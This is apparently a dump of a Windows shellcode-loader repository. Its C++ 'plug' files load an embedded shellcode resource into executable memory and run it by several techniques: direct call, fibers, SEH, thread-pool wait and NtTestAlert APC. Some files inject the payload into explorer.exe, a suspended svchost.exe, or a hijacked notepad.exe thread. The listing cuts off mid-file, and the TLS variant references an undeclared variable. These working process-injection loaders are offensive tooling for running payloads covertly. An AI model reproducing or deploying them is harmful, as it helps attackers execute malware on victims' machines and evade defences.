├── Readme.assets
├── .gitkeep
├── image-20201124160121278.png
├── image-20201124160202106.png
├── image-20201124160330548.png
├── image-20201124160839607.png
├── image-20201124161035698.png
├── image-20201124161715516.png
├── image-20201124162310551.png
├── image-20201124162327193.png
├── image-20201124162721783.png
├── image-20201124162912373.png
├── image-20201124163656133.png
├── image-20201124163815942.png
├── image-20201130105338767.png
├── image-20201130105408030.png
├── image-20201130105439913.png
├── image-20201130105542851.png
├── image-20201130105623219.png
├── image-20201130105709563.png
├── image-20201130105735363.png
└── 1fef278889c961331a185698c35d220.png
├── plug
├── public.hpp
├── Dynamic Load
│ ├── public.hpp
│ ├── Dynamic Load.vcxproj.filters
│ ├── Dynamic.cpp
│ └── Dynamic Load.vcxproj
├── Dynamic Load plus
│ ├── public.hpp
│ ├── Dynamic Load plus.vcxproj.filters
│ ├── Dynamic_plus.cpp
│ └── Dynamic Load plus.vcxproj
├── TLS Callback Load
│ ├── public.hpp
│ ├── TLS Callback Load.vcxproj.filters
│ ├── TLS.cpp
│ └── TLS Callback Load.vcxproj
├── Direct Load
│ ├── Direct Load.vcxproj.filters
│ ├── Direct.cpp
│ └── Direct Load.vcxproj
├── Fiber Load
│ ├── Fiber Load.vcxproj.filters
│ ├── Fiber.cpp
│ └── Fiber Load.vcxproj
├── APC-Ijnect Load
│ ├── APC-Ijnect Load.vcxproj.filters
│ ├── APC.cpp
│ └── APC-Ijnect Load.vcxproj
├── SEH Except Load
│ ├── SEH Except Load.vcxproj.filters
│ ├── SEH.cpp
│ └── SEH Except Load.vcxproj
├── Syscall Load
│ ├── Syscall Load.vcxproj.filters
│ ├── Syscall.cpp
│ └── Syscall Load.vcxproj
├── NtTestAlert Load
│ ├── NtTestAlert Load.vcxproj.filters
│ ├── NtTestAlert.cpp
│ └── NtTestAlert Load.vcxproj
├── OEP Hiijack-Inject Load
│ ├── OEP Hiijack-Inject Load.vcxproj.filters
│ ├── OEP.cpp
│ └── OEP Hiijack-Inject Load.vcxproj
├── Thread Hiijack-Inject Load
│ ├── Thread Hiijack-Inject Load.vcxproj.filters
│ ├── Thread.cpp
│ └── Thread Hiijack-Inject Load.vcxproj
├── Early Bird APC-Injetc Load
│ ├── Early Bird APC-Injetc Load.vcxproj.filters
│ ├── Early_APC.cpp
│ └── Early Bird APC-Injetc Load.vcxproj
├── CreateThreatPoolWait Load
│ ├── CreateThreatPoolWait Load.vcxproj.filters
│ ├── CreateThreatPoolWait.cpp
│ └── CreateThreatPoolWait Load.vcxproj
└── NtCreateSection-Inject Load
│ ├── NtCreateSection-Inject Load.vcxproj.filters
│ ├── NtCreateSection.cpp
│ └── NtCreateSection-Inject Load.vcxproj
├── shellcodeLoader
├── stdafx.h
├── resource.h
├── stdafx.cpp
├── targetver.h
├── shellcodeLoader.h
├── shellcodeLoader.rc
├── shellcodeLoader.cpp
├── shellcodeLoaderDlg.h
├── res
│ ├── shellcodeLoader.ico
│ └── shellcodeLoader.rc2
├── shellcodeLoaderDlg.cpp
├── shellcodeLoader.vcxproj.filters
└── shellcodeLoader.vcxproj
├── readme_cn.md
├── Readme.md
└── shellcodeLoader.sln
/Readme.assets/.gitkeep:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/plug/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/public.hpp
--------------------------------------------------------------------------------
/shellcodeLoader/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/stdafx.h
--------------------------------------------------------------------------------
/shellcodeLoader/resource.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/resource.h
--------------------------------------------------------------------------------
/shellcodeLoader/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/stdafx.cpp
--------------------------------------------------------------------------------
/plug/Dynamic Load/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/Dynamic Load/public.hpp
--------------------------------------------------------------------------------
/shellcodeLoader/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/targetver.h
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/Dynamic Load plus/public.hpp
--------------------------------------------------------------------------------
/plug/TLS Callback Load/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/TLS Callback Load/public.hpp
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoader.h
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoader.rc
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoader.cpp
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoaderDlg.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoaderDlg.h
--------------------------------------------------------------------------------
/shellcodeLoader/res/shellcodeLoader.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/res/shellcodeLoader.ico
--------------------------------------------------------------------------------
/shellcodeLoader/res/shellcodeLoader.rc2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/res/shellcodeLoader.rc2
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoaderDlg.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoaderDlg.cpp
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160121278.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160121278.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160202106.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160202106.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160330548.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160330548.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160839607.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160839607.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124161035698.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124161035698.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124161715516.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124161715516.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162310551.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162310551.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162327193.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162327193.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162721783.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162721783.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162912373.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162912373.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124163656133.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124163656133.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124163815942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124163815942.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105338767.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105338767.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105408030.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105408030.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105439913.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105439913.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105542851.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105542851.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105623219.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105623219.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105709563.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105709563.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105735363.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105735363.png
--------------------------------------------------------------------------------
/Readme.assets/1fef278889c961331a185698c35d220.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/1fef278889c961331a185698c35d220.png
--------------------------------------------------------------------------------
/plug/Direct Load/Direct Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Fiber Load/Fiber Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/APC-Ijnect Load/APC-Ijnect Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/SEH Except Load/SEH Except Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Syscall Load/Syscall Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/NtTestAlert Load/NtTestAlert Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/OEP Hiijack-Inject Load/OEP Hiijack-Inject Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Thread Hiijack-Inject Load/Thread Hiijack-Inject Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Early Bird APC-Injetc Load/Early Bird APC-Injetc Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/CreateThreatPoolWait Load/CreateThreatPoolWait Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/NtCreateSection-Inject Load/NtCreateSection-Inject Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Direct Load/Direct.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | {
5 | //1.Get shellcode and shellcodesize from Resource by ID
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0;
11 | }
12 | //2.Get shellcode memory
13 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
14 | memcpy(Memory, shellcode, shellcodeSize);
15 | //3.Execute shellcode
16 | ((void(*)())Memory)();
17 | return 0;
18 | }
--------------------------------------------------------------------------------
/plug/Dynamic Load/Dynamic Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
15 |
16 | 源文件
17 |
18 |
19 |
--------------------------------------------------------------------------------
/plug/TLS Callback Load/TLS Callback Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
15 |
16 | 源文件
17 |
18 |
19 |
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/Dynamic Load plus.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
15 |
16 | 源文件
17 |
18 |
19 |
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/Dynamic_plus.cpp:
--------------------------------------------------------------------------------
1 | #include"public.hpp"
2 |
3 |
4 |
5 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
6 | {
7 | //1.Get shellcode and shellcodesize from Resource by ID
8 | UINT shellcodeSize = 0;
9 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
10 | if (shellcode == nullptr)
11 | {
12 | return 0;
13 | }
14 | //2.Get shellcode memory
15 | pfnVirtualAlloc fnVirtualAlloc = (pfnVirtualAlloc)GetKernelFunc("VirtualAlloc");
16 | LPVOID Memory = fnVirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
17 | memcpy(Memory, shellcode, shellcodeSize);
18 | //3.Execute shellcode
19 | ((void(*)())Memory)();
20 | return 0;
21 | }
--------------------------------------------------------------------------------
/plug/Dynamic Load/Dynamic.cpp:
--------------------------------------------------------------------------------
1 | #include"public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | {
5 | //1.Get shellcode and shellcodesize from Resource by ID
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0;
11 | }
12 | //2.Get shellcode memory
13 | pfnVirtualAlloc fnVirtualAlloc = (pfnVirtualAlloc)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "VirtualAlloc");
14 | LPVOID Memory = fnVirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
15 | memcpy(Memory, shellcode, shellcodeSize);
16 | //3.Execute shellcode
17 | ((void(*)())Memory)();
18 | return 0;
19 | }
20 |
--------------------------------------------------------------------------------
/plug/TLS Callback Load/TLS.cpp:
--------------------------------------------------------------------------------
1 | #include"public.hpp"
2 |
3 |
4 |
5 | VOID NTAPI TlsCallBack(PVOID DllHandle, DWORD dwReason, PVOID Reserved)
6 | {
7 | if (dwReason == DLL_PROCESS_ATTACH)
8 | {
9 | //1.Get shellcode and shellcodesize from Resource by ID
10 | UINT shellcodeSize = 0;
11 | GetShellcodeFromRes(100, shellcodeSize);
12 | //2.Execute shellcode
13 | ((void(*)())Memory)();
14 | }
15 | }
16 |
17 |
18 | #pragma comment (linker, "/INCLUDE:__tls_used")
19 | #pragma comment (linker, "/INCLUDE:__tls_callback")
20 |
21 |
22 | #pragma data_seg (".CRT$XLB")
23 | EXTERN_C PIMAGE_TLS_CALLBACK _tls_callback = TlsCallBack;
24 | #pragma data_seg ()
25 |
26 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
27 | {
28 | return 0;
29 | }
--------------------------------------------------------------------------------
/plug/Fiber Load/Fiber.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 |
4 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
5 | {
6 | //1.Get shellcode and shellcodesize from Resource by ID
7 | UINT shellcodeSize = 0;
8 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
9 | if (shellcode == nullptr)
10 | {
11 | return 0;
12 | }
13 | //2.Get shellcode memory
14 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
15 | memcpy(Memory, shellcode, shellcodeSize);
16 | //3.Execute shellcode
17 | PVOID mainFiber = ConvertThreadToFiber(NULL);
18 | PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)Memory, NULL);
19 | SwitchToFiber(shellcodeFiber);
20 | DeleteFiber(shellcodeFiber);
21 | return 0;
22 | }
--------------------------------------------------------------------------------
/plug/SEH Except Load/SEH.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | LPVOID Memory;
4 | int ExceptFilter()
5 | {
6 | ((void(*)())Memory)();
7 | return EXCEPTION_CONTINUE_EXECUTION;
8 | }
9 |
10 |
11 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
12 | {
13 | //1.Get shellcode and shellcodesize from Resource by ID
14 | UINT shellcodeSize = 0;
15 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
16 | if (shellcode == nullptr)
17 | {
18 | return 0;
19 | }
20 | //2.Get shellcode memory
21 | Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
22 | memcpy(Memory, shellcode, shellcodeSize);
23 | //3.Execute shellcode
24 | int* p = 0x00000000;
25 | _try
26 | {
27 | *p = 13;
28 | }
29 | _except(ExceptFilter())
30 | {
31 | };
32 | return 0;
33 | }
--------------------------------------------------------------------------------
/plug/CreateThreatPoolWait Load/CreateThreatPoolWait.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | {
5 | //1.Get shellcode and shellcodesize from Resource by ID
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0;
11 | }
12 | //2.Get shellcode memory
13 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
14 | memcpy(Memory, shellcode, shellcodeSize);
15 | //3.Execute shellcode
16 | HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
17 | PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)Memory, NULL, NULL);
18 | SetThreadpoolWait(threadPoolWait, event, NULL);
19 | WaitForSingleObject(event, INFINITE);
20 | return 0;
21 | }
--------------------------------------------------------------------------------
/plug/NtTestAlert Load/NtTestAlert.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | //#pragma comment(lib, "ntdll")
3 | using pNtTestAlert = NTSTATUS(NTAPI*)();
4 |
5 |
6 |
7 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
8 | {
9 | //1.Get shellcode and shellcodesize from Resource by ID
10 | UINT shellcodeSize = 0;
11 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
12 | if (shellcode == nullptr)
13 | {
14 | return 0;
15 | }
16 | //2.Get shellcode memory
17 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
18 | memcpy(Memory, shellcode, shellcodeSize);
19 | //3.Execute shellcode
20 | pNtTestAlert NtTestAlert = (pNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
21 | PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)Memory;
22 | QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
23 | NtTestAlert();
24 | return 0;
25 | }
--------------------------------------------------------------------------------
/plug/Early Bird APC-Injetc Load/Early_APC.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | {
5 | //1.Get shellcode and shellcodesize from Resource by ID
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0;
11 | }
12 | //2.Get shellcode memory
13 | STARTUPINFOA si = { 0 };
14 | PROCESS_INFORMATION pi = { 0 };
15 | CreateProcessA("C:\\Windows\\System32\\svchost.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
16 | HANDLE victimProcess = pi.hProcess;
17 | HANDLE threadHandle = pi.hThread;
18 | LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
19 | //3.Execute shellcode
20 | PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
21 | WriteProcessMemory(victimProcess, shellAddress, shellcode, shellcodeSize, NULL);
22 | QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
23 | ResumeThread(threadHandle);
24 | return 0;
25 | }
--------------------------------------------------------------------------------
/plug/APC-Ijnect Load/APC.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 |
4 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
5 | {
6 | //1.Get shellcode and shellcodesize from Resource by ID
7 | UINT shellcodeSize = 0;
8 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
9 | if (shellcode == nullptr)
10 | {
11 | return 0;
12 | }
13 | //2.Get shellcode memory
14 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
15 | PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };
16 | if (Process32First(snapshot, &processEntry))
17 | {
18 | while (_wcsicmp(processEntry.szExeFile, L"explorer.exe") != 0)
19 | {
20 | Process32Next(snapshot, &processEntry);
21 | }
22 | }
23 | HANDLE victimProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, processEntry.th32ProcessID);
24 | LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
25 | //3.Execute shellcode
26 | PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
27 | WriteProcessMemory(victimProcess, shellAddress, shellcode, shellcodeSize, NULL);
28 | THREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };
29 | std::vector threadIds;
30 | if (Thread32First(snapshot, &threadEntry))
31 | {
32 | do {
33 | if (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID)
34 | {
35 | threadIds.push_back(threadEntry.th32ThreadID);
36 | }
37 | } while (Thread32Next(snapshot, &threadEntry));
38 | }
39 | for (DWORD threadId : threadIds)
40 | {
41 | HANDLE threadHandle = OpenThread(THREAD_ALL_ACCESS, TRUE, threadId);
42 | QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);
43 | Sleep(1000 * 2);
44 | }
45 | return 0;
46 | }
--------------------------------------------------------------------------------
/plug/Thread Hiijack-Inject Load/Thread.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | #include
3 |
4 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
5 | {
6 | //1.Get shellcode and shellcodesize from Resource by ID
7 | UINT shellcodeSize = 0;
8 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
9 | if (shellcode == nullptr)
10 | {
11 | return 0;
12 | }
13 | //2.Execute shellcode
14 | HANDLE targetProcessHandle;
15 | PVOID remoteBuffer;
16 | HANDLE threadHijacked = NULL;
17 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
18 | THREADENTRY32 threadEntry;
19 | CONTEXT context;
20 | PROCESSENTRY32 processEntry = { 0 };
21 | processEntry.dwSize = sizeof(PROCESSENTRY32);
22 | if (Process32First(snapshot, &processEntry))
23 | {
24 | while (_wcsicmp(processEntry.szExeFile, L"notepad.exe") != 0)
25 | {
26 | Process32Next(snapshot, &processEntry);
27 | }
28 | }
29 | DWORD targetPID = processEntry.th32ProcessID;
30 | context.ContextFlags = CONTEXT_FULL;
31 | threadEntry.dwSize = sizeof(THREADENTRY32);
32 | targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
33 | remoteBuffer = VirtualAllocEx(targetProcessHandle, NULL, shellcodeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
34 | WriteProcessMemory(targetProcessHandle, remoteBuffer, shellcode, shellcodeSize, NULL);
35 | Thread32First(snapshot, &threadEntry);
36 | while (Thread32Next(snapshot, &threadEntry))
37 | {
38 | if (threadEntry.th32OwnerProcessID == targetPID)
39 | {
40 | threadHijacked = OpenThread(THREAD_ALL_ACCESS, FALSE, threadEntry.th32ThreadID);
41 | break;
42 | }
43 | }
44 | SuspendThread(threadHijacked);
